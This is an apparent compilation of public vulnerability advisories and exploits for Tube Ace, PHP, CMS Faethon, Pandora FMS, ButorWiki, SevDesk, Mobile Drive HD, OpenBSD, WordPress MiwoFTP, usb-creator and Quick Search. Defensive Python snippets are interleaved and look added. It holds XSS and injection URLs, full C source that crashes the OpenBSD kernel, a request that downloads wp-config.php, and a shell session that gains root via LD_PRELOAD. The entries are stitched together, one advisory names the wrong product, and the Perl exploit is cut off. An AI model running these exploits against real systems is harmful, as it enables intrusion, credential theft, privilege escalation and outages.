
source: https://www.securityfocus.com/bid/52046/info

Tube Ace is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E&channel= 
            
source: https://www.securityfocus.com/bid/52043/info

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to exhaust available memory, denying access to legitimate users.

PHP versions prior to 5.3.9 are vulnerable. 

<?php
while (true)
{
strtotime('Monday 00:00 Europe/Paris'); // Memory leak
}
?> 
            
source: https://www.securityfocus.com/bid/52053/info

CMS Faethon is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CMS Faethon 1.3.4 is vulnerable; other versions may also be affected. 

http://www.example.com/articles.php?by_author=[SQL]
http://www.example.com/article.php?id=[SQL] 
            
source: https://www.securityfocus.com/bid/52058/info

Pandora FMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.

Pandora FMS 4.0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/[ Path ]/index.php?sec=services&sec2=[FILE INCLUDE VULNERABILITY!] 
            
HireHackking

ButorWiki 3.0 - 'service' Cross-Site Scripting

source: https://www.securityfocus.com/bid/52059/info

ButorWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

ButorWiki 3.0.0 is vulnerable; other versions may also be affected.

http://www.example.com/sso/signin?service=%22%22%3E%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E
HireHackking

SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities

Document Title:
===============
SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1314

Release Date:
=============
2015-03-23

Vulnerability Laboratory ID (VL-ID):
====================================
1314

Common Vulnerability Scoring System:
====================================
5.9

Product & Service Introduction:
===============================
The integrated customer management, digital customer file is the central record for a single customer. Invoices, facilities and operations to a customer are stored centrally and automated in one place. So the customer file is always up to date. For faster retrieval or reporting, contacts can be tagged. In addition, with powerful search options you have the entire customer base better than ever in view.

Daily backup
256bit SSL encryption
TÜV certified datacenter
Free version
No hidden costs
No minimum contract term
iPhone App
Runs in any browser
No installation required on the PC
Easy to use
Reduced to the essentials
Automated, where it is only possible

(Copy of the Vendor Homepage: https://sevdesk.de/)

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official SEVENIT GmbH SevDesk v3.10 web-application & cloud online-service.

Vulnerability Disclosure Timeline:
==================================
2014-09-01: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-02: Vendor Notification (SevDesk Developer Team)
2014-09-07: Vendor Response/Feedback (SevDesk Developer Team)
2015-02-01: Vendor Fix/Patch Notification (SevDesk Developer Team)
2015-03-23: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
SevenIT
Product: SevDesk - Web Application 3.1.0

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities are detected in the official SEVENIT Software GmbH - sevDesk v3.10 web-application. The vulnerability allows remote attackers or low privileged user accounts to inject their own malicious script code into the application-side of the vulnerable web-application module or service.

The security vulnerability is located in the `firstname`, `surname` & `family name` values of the main sevDesk `Dashboard` application module. Remote attackers are able to inject their own code into the main dashboard service by manipulating the registration username. The execution of the injected script code occurs on the application-side in the main dashboard module through the rightHead and feedcontent class. The attack vector is persistent and the request method to inject the code is POST. The victim user can also change the name by usage of the application, which does not require an admin's interaction on successful exploitation.

The security risk of the persistent script code inject web vulnerabilities is estimated as medium with a cvss (common vulnerability scoring system) count of 5.9. Exploitation of the persistent vulnerability requires a low privileged sevdesk user account with restricted access and no direct user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious sources and persistent manipulation of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Registration to SevDesk

Vulnerable Parameter(s):
[+] surname
[+] firstname
[+] family name

Affected Module(s):
[+] Dashboard Index - rightHead & feedcontent

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by low privileged application user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability
1. Register an account by usage of the following webpage https://my.sevdesk.de/register/
2. Include to the surname, family name and firstname your own script code as payload
3. Save the registration form and go to the website https://my.sevdesk.de/
4. Login with the user account data
5. The execution of the injected script code occurs after the registration POST method request and next to the redirect in the main dashboard index (rightHead < name > feedcontent)
6. Successful reproduce of the application-side security vulnerability!

PoC: rightHead > Displayname (First- & Lastname)

<div id="middleHead">
<input id="suche" type="text" onfocus="this.value = ''" value="Gehe zu Kontakt, Projekt, Dokument..." />
</div>
<div id="rightHead">
<div style="float:right;margin-top:5px;text-align: right;padding-right:5px;">
<div style="color:#fff;padding:3px;margin-bottom:2px;">
<span style="color:#f5d385;font-weight:bold;">a>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> b>"</span></div>
<a href="/admin/company">Einstellungen</a> | <a href="http://portal.sevdesk.de/" target="_blank">Hilfe</a> | <a href="./auth/logout/">Logout</a>
</div>
</div>
</div>
</div>
<div id="headNav" style="top:80px;">
<div class="headwrapper">
<ul id="mainNavigation">

PoC: Verlauf > feedcontent

<div>
<div class="feed" id_feed="393424"><div class="imgpos"><img src="/img/icons/24x24/offer.png"></div><div class="feedbody">
<div class="headline">Samstag, 30. August 2014 - 02:14</div><div class="feedcontent">
a>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> b>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> hat den Status des <img src="/img/icons/16x16/offer.png"> <a href="/om/detail/index/id/60547">Angebots - 1007</a> auf "archiviert" geändert
</div></div><div class="clearfix"></div></div>
<div class="feed" id_feed="393423"><div class="imgpos"><img src="/img/icons/24x24/offer.png"/></div><div class="feedbody">
<div class="headline">Samstag, 30. August 2014 - 02:14


--- PoC Session Logs [POST] (Registration sevDesk) ---
Status: 200[OK]
POST https://my.sevdesk.de/register/save
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[94] Mime Type[text/html]
Request Header:
Host[my.sevdesk.de]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[https://my.sevdesk.de/register]
Content-Length[119]
Cookie[PHPSESSID=63m788aic41f173a01akttgp24; optimizelySegments=%7B%7D; optimizelyEndUserId=oeu1409658038644r0.9444753343384411; optimizelyBuckets=%7B%7D; __utma=47898149.1078820709.1409658041.1409658041.1409658041.1; __utmb=47898149.3.10.1409658041; __utmc=47898149; __utmz=47898149.1409658041.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); kvcd=1409658049586; km_ai=5La%2FUBeVvA7zRXwSTd4gSRBJccE%3D; km_uq=; km_vs=1; km_lv=1409658050; _ga=GA1.2.1078820709.1409658041]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
name[[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]]
surename[[PERSISTENT INJECTED SCRIPT CODE VIA SURNAME VALUE!]]
familyname[[PERSISTENT INJECTED SCRIPT CODE VIA FAMILY NAME VALUE!]]
username[support%40vulnerability-lab.com]
password[chaos666]
Response Header:
Date[Tue, 02 Sep 2014 11:44:30 GMT]
Server[Apache/2.2.22 (Debian)]
X-Powered-By[PHP/5.4.4-14+deb7u7]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[94]
Keep-Alive[timeout=5, max=99]
Connection[Keep-Alive]
Content-Type[text/html; charset=utf-8]

Reference(s):
https://my.sevdesk.de/register/save

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the affected rightHead & feedcontent values in the dashboard application index.
Filter and restrict the user registration input form with a secure mask or exception-handling to prevent persistent code injections in the important name values.

Note: The issue has been patched by the manufacturer since 2015-02-01

Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities in the main dashboard application is estimated as medium. (CVSS 5.9)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking

Mobile Drive HD 1.8 - Local File Inclusion

Document Title:
===============
Mobile Drive HD v1.8 - File Include Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1446

Release Date:
=============
2015-03-11

Vulnerability Laboratory ID (VL-ID):
====================================
1446

Common Vulnerability Scoring System:
====================================
6.4

Product & Service Introduction:
===============================
Mobile Drive is the ideal app for anyone who transfers documents between PC, iPad and Cloud. Mobile Drive allows you to manage documents and organize them. You can quickly upload and download documents via email and the popular cloud storage services.

(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/mobile-drive-hd-document-cloud/id626102554 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a file include web vulnerability in the Mobile Drive HD v1.8 iOS mobile application.

Vulnerability Disclosure Timeline:
==================================
2015-03-11: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Keke Cai
Product: Mobile Drive HD - iOS Mobile Web Application 1.8

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official USB Disk Free - File Manager & Transfer v1.0 iOS mobile application. The local file include web vulnerability allows remote attackers to include local file/path requests or system-specific path commands without authorization to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject their own files with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable upload POST method request. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.

The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application compromise or connected device component compromise.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)

Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC:
http://localhost:8080/files/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png

PoC: Vulnerable Source

<tr class="shadow"><td><a href="/files/%3Ciframe%3E2.png" class="file">[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a></td><td class='del'>
<form action='/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png' method='post'><input name='_method' value='delete' type='hidden'/>
<input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr></tbody>
</table>

--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------21144193462
Content-Disposition: form-data; name="newfile"; filename="[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/
Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2739] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[2739]
Date[Mo., 09 März 2015 14:24:12 GMT]
-
Status: 200[OK]
GET http://localhost:8080/jquery.js
Load Flags[LOAD_NORMAL] Größe des Inhalts[55774] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[55774]
Date[Mo., 09 März 2015 14:24:12 GMT]
-
Status: 200[OK]
GET http://localhost:8080/files?Mon%20Mar%2009%202015%2015:26:02%20GMT+0100
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[62] Mime Type[text/plain]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[application/json, text/javascript, */*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[62]
Cache-Control[private, max-age=0, must-revalidate]
Content-Type[text/plain; charset=utf-8]
Date[Mo., 09 März 2015 14:24:13 GMT]

Reference(s):
http://localhost:8080/files/
http://localhost:8080/jquery.js

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request.
Restrict the filename input and disallow special chars. Ensure that multiple file extensions are not accepted in the filename value to prevent arbitrary file upload attacks.
Encode the output in the file dir index list with the vulnerable name value to prevent application-side injection attacks.

Security Risk:
==============
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.4)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
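The fix section above asks for three things: a closed filename syntax, no stacked extensions, and encoding of the name when it is written back into the listing (the same output-encoding point the SevDesk rightHead/feedcontent fix above makes for name fields). The following is an added illustration of those three checks, not the app's or the advisory's own code; the function names, the allowed-extension set and the sample filenames are assumptions.

```python
"""Upload filename validation plus an encoded directory-listing row.

Added illustration for the Mobile Drive HD upload/listing report above;
not the app's own code. Function names and the extension set are assumptions.
"""
import html
import re
from typing import Tuple

# One extension only, from a small set a file manager would expect to serve.
ALLOWED_EXT = frozenset({"png", "jpg", "pdf", "txt"})

# Base name of safe characters, exactly one dot, then the extension.
# Because '.' is excluded from the base name, 'a.php.png' cannot match.
_SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_\-]{1,64}\.([A-Za-z0-9]{1,8})$")


def validate_upload_filename(raw: str) -> Tuple[bool, str]:
    """Return (True, name) or (False, reason) for a multipart 'filename' value.

    Order of checks: control bytes, path separators and traversal components
    (the '/' inside the report's '%3E/2.png' name), then the closed syntax
    above, which also rejects '<', '>' and multiple extensions, then the
    extension allowlist.
    """
    if not raw or any(ord(c) < 32 or ord(c) == 127 for c in raw):
        return False, "empty name or control character"
    if "/" in raw or "\\" in raw or raw in (".", "..") or raw.startswith("."):
        return False, "path separator or traversal component"
    m = _SAFE_NAME_RE.match(raw)
    if not m:
        return False, "disallowed characters or missing/multiple extension"
    ext = m.group(1).lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension not allowed: {ext}"
    return True, raw


def render_listing_row(stored_name: str) -> str:
    """HTML-encode the stored name both inside the href and as visible text.

    Even a name that passed validation is treated as untrusted on output, so
    the listing row cannot become the injection point shown in the report.
    """
    href = "/files/" + html.escape(stored_name, quote=True)
    return (f'<tr><td><a href="{href}" class="file">'
            f"{html.escape(stored_name)}</a></td></tr>")


if __name__ == "__main__":
    # Constructed samples modelled on the filenames quoted in the report.
    for name in ("<iframe>2.png", "x/2.png", "report.php.png", "2.png"):
        print(name, "->", validate_upload_filename(name))
    print(render_listing_row("<iframe>2.png"))
```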
HireHackking

OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)

/*
# Exploit Title: OpenBSD <= 5.6 - Multiple Local Kernel Panics
# Exploit Author: nitr0us
# Vendor Homepage: http://www.openbsd.org
# Version: 5.6
# Tested on: OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014), OpenBSD 5.6 i386, OpenBSD 5.5 i386

 * - 0xb16b00b5.c
 *
 * - Alejandro Hernandez (@nitr0usmx)
 * - Mexico 2015
 *
 * #########################################################################
 * # OpenBSD <= 5.6 kernel panic()'s in sys/uvm/uvm_map.c                  #
 * #########################################################################
 *
 * Tested under:
 * - OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014)
 * - OpenBSD 5.6 i386
 * - OpenBSD 5.5 i386
 *
 * https://www.youtube.com/watch?feature=player_detailpage&v=PReopSQZOrY#t=20
 *
 */

#include <stdio.h>
#include <stdlib.h>     /* arc4random(), system() */
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/types.h>

#ifndef __OpenBSD__
#error "Not OpenBSD !!!1111";
#else
#include <sys/exec_elf.h>
#endif

#ifndef __i386__
#error "Not i386 !!!1111";
#endif

char big_b00bz[] =
" 8M:::::::8888M:::::888:::::::88:::8888888::::::::Mm\n"
" 88MM:::::8888M:::::::88::::::::8:::::888888:::M:::::M\n"
" 8888M:::::888MM::::::::8:::::::::::M::::8888::::M::::M\n"
" 88888M:::::88:M::::::::::8:::::::::::M:::8888::::::M::M\n"
" 88 888MM:::888:M:::::::::::::::::::::::M:8888:::::::::M:\n"
" 8 88888M:::88::M:::::::::::::::::::::::MM:88::::::::::::M\n"
" 88888M:::88::M::::::::::*88*::::::::::M:88::::::::::::::M\n"
" 888888M:::88::M:::::::::88@@88:::::::::M::88::::::::::::::M\n"
" 888888MM::88::MM::::::::88@@88:::::::::M:::8::::::::::::::*8\n"
" 88888 M:::8::MM:::::::::*88*::::::::::M:::::::::::::::::88@@\n"
" 8888 MM::::::MM:::::::::::::::::::::MM:::::::::::::::::88@@\n"
" 888 M:::::::MM:::::::::::::::::::MM::M::::::::::::::::*8\n"
" 888 MM:::::::MMM::::::::::::::::MM:::MM:::::::::::::::M\n"
" 88 M::::::::MMMM:::::::::::MMMM:::::MM::::::::::::MM\n"
" 88 MM:::::::::MMMMMMMMMMMMMMM::::::::MMM::::::::MMM\n"
" 88 MM::::::::::::MMMMMMM::::::::::::::MMMMMMMMMM\n"
" 88 8MM::::::::::::::::::::::::::::::::::MMMMMM\n"
" 8 88MM::::::::::::::::::::::M:::M::::::::MM\n"
" 888MM::::::::::::::::::MM::::::MM::::::M";

int main(int argc, char **argv)
{
	Elf32_Ehdr *hdr;
	Elf32_Phdr *pht;
	struct stat statinfo;
	char *elfptr;
	int fd;

	if(argc != 2)
		return printf("Usage: %s <elf_exec>\n", argv[0]);

	/* map the target executable read/write so the program header table can be patched in place */
	fd = open(argv[1], O_RDWR);
	fstat(fd, &statinfo);
	elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

	hdr = (Elf32_Ehdr *) (elfptr);
	pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);

	printf("%s", big_b00bz);

	pht[9].p_type   = 0x7defaced;                                     // <--- these overwrites ------------v
	pht[2].p_filesz = (arc4random() % 2) ? 0x41414141 : 0x43434343;   // are necessary

	sleep(3 + (arc4random() % 3));

	if(arc4random() % 3 == 2)
		puts(" .. I like b1g 0nez !!");                               // 33.33% chance
	else {
		if(arc4random() % 2){
			puts(" .. want s0me ?!");
			pht[5].p_vaddr = 0xb16b00b5;
		}                                                         // .6666 * .5 = 33.33% chance
		else {
			puts(" .. j00 like it ?!");
			pht[5].p_vaddr = 0x0ace55e8;
		}
	}                                                                 // .6666 * .5 = 33.33% chance

	msync(elfptr, 0, MS_ASYNC);
	munmap(elfptr, statinfo.st_size);
	close(fd);

	sleep(3 + (arc4random() % 3));

	system(argv[1]);                                                  // ( o )( o ) panic()

	puts("... s0rry, this piece of sh1t didn't w0rk in j00r obsd\n");

	return 0xDEFECA7E;
}
HireHackking

WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (2)

######################
# Exploit Title : WordPress MiwoFTP Plugin 1.0.5 <= Arbitrary File Download
# Exploit Author : Dadou Dz
# Software Link : Premium
# Dork Google: inurl:com_miwoftp
# Affected version: 1.0.5
# Vendor Homepage: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog
# Date : 2015-04-20
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
######################

# Exploit:
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=[....somefile....]&order=name&srt=yes

"download_file" : wp-config.php
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes

#####################
Discovered By : Dadou Dz
My Email - dadoudzdz@gmail.com
fb: fb.com/Dz2Team

[ Thanks To ]
Toxic Dz ~ faroukovic DZ _ PaWL _ bl4ck-dz _ Abdellah Elmaghribi
Algerian To The Core - Dz Team - 1337day Community Algeria - Fallaga Team
AnonGhost Team - Anonymous Dz - Backup Sec Dz
Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com - dz-root.com
And All My Friends - All Muslims Hackers - All Algerian Hackers
#####################
HireHackking
Source: http://www.openwall.com/lists/oss-security/2015/04/22/12
Bug report: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396

Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1)
Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1)
Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3)

$ cat > test.c
void __attribute__((constructor)) init (void) {
    chown("/tmp/test", 0, 0);
    chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)
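The root cause shown in the session above is a privileged D-Bus method that takes an environment dictionary from an unprivileged caller and hands it to a process it starts as root, so LD_PRELOAD rides along. The following is an added illustration of the defensive counterpart, not usb-creator's own code or its patch: the helper copies only an allowlist of expected keys into the child environment, validates their values, and fails closed on anything else. The function names, the allowlist and the base environment are assumptions.

```python
"""Allowlist the environment a privileged helper passes to a child process.

Added illustration for the usb-creator KVMTest report above; not the
project's own code. Function names, ALLOWED_KEYS and the base PATH are
assumptions chosen for the example.
"""
import re
from typing import Dict, Optional, Tuple, Union

# The only caller-supplied keys a KVM test launcher legitimately needs.
ALLOWED_KEYS = frozenset({"DISPLAY", "XAUTHORITY"})

# Dynamic-loader variables that must never be caller-controlled in a
# root-started process; LD_PRELOAD is the one used in the report.
LOADER_PREFIXES = ("LD_", "DYLD_")

# Conservative value syntax for the two allowed keys.
_DISPLAY_RE = re.compile(r"^[A-Za-z0-9.\-]*:[0-9]+(\.[0-9]+)?$")
_XAUTH_RE = re.compile(r"^/[A-Za-z0-9._/\-]+$")


class EnvRejected(ValueError):
    """Raised when the caller-supplied environment is not acceptable."""


def sanitize_kvm_env(requested: Dict[str, str],
                     base: Optional[Dict[str, str]] = None) -> Dict[str, str]:
    """Build the child environment from a minimal base plus allowlisted keys.

    The caller's dictionary is never merged wholesale. Loader variables and
    unknown keys raise EnvRejected so the request fails closed rather than
    silently dropping keys; allowed keys are copied only after their values
    pass a syntax check (no control characters, expected shape).
    """
    env = dict(base if base is not None else {"PATH": "/usr/bin:/bin"})

    loader = sorted(k for k in requested if k.startswith(LOADER_PREFIXES))
    if loader:
        raise EnvRejected("loader variable not permitted: " + ",".join(loader))

    unknown = sorted(set(requested) - ALLOWED_KEYS)
    if unknown:
        raise EnvRejected("unexpected variable: " + ",".join(unknown))

    for key, value in requested.items():
        if "\0" in value or "\n" in value:
            raise EnvRejected(f"control character in {key}")
        if key == "DISPLAY" and not _DISPLAY_RE.match(value):
            raise EnvRejected("malformed DISPLAY")
        if key == "XAUTHORITY" and not _XAUTH_RE.match(value):
            raise EnvRejected("malformed XAUTHORITY")
        env[key] = value
    return env


def classify_request(requested: Dict[str, str]) -> Tuple[str, Union[Dict[str, str], str]]:
    """Return ('ok', env) or ('rejected', reason); the reason is what to log."""
    try:
        return "ok", sanitize_kvm_env(requested)
    except EnvRejected as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    # Constructed sample with the same dictionary shape as the dbus-send call above.
    attempt = {"DISPLAY": "foo", "XAUTHORITY": "foo", "LD_PRELOAD": "/tmp/test.so"}
    print(classify_request(attempt))
    print(classify_request({"DISPLAY": ":0", "XAUTHORITY": "/home/user/.Xauthority"}))
```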
HireHackking
#!/usr/bin/perl
##################################################################################################
# Exploit Title: Quick Search 1.1.0.189 'search textbox' Unicode SEH egghunter Buffer Overflow
# Date: 2015-04-23
# Exploit Author: Tomislav Paskalev
# Vulnerable Software: Quick Search v1.1.0.189
# Vendor Homepage: http://www.glarysoft.com/
# Software Link: https://www.exploit-db.com/apps/93feb6805c08d3ca84b0636a3a986a56-qsearchsetup.exe
# Version: 1.1.0.189
# Tested on: Windows XP SP2 EN
# OSVDB-ID: 93445
##################################################################################################
# Credits:
#   - Vulnerability identified by ariarat
#     http://www.exploit-db.com/exploits/25443/
##################################################################################################
# Exploit development notes:
#   - instead of attaching the process, start the executable within the debugger
#   - the application's module gtms_D7.bpl was not compiled with SafeSEH
#   - since this is a unicode buffer overflow \x00 will not terminate the string
#   - 6 available unicode friendly P/P/R pointers within the module
#   - this exploit should work across different OS versions
#     (tested only on Win XP SP2 EN)
#   - several other unicode friendly application modules are available, but have not been checked
##################################################################################################
# How to exploit:
#   - Quick Search -> (click arrow for menu) Match Path -> (click arrow for menu) Full Mode ->
#     (paste created exploit string into the search textbox)
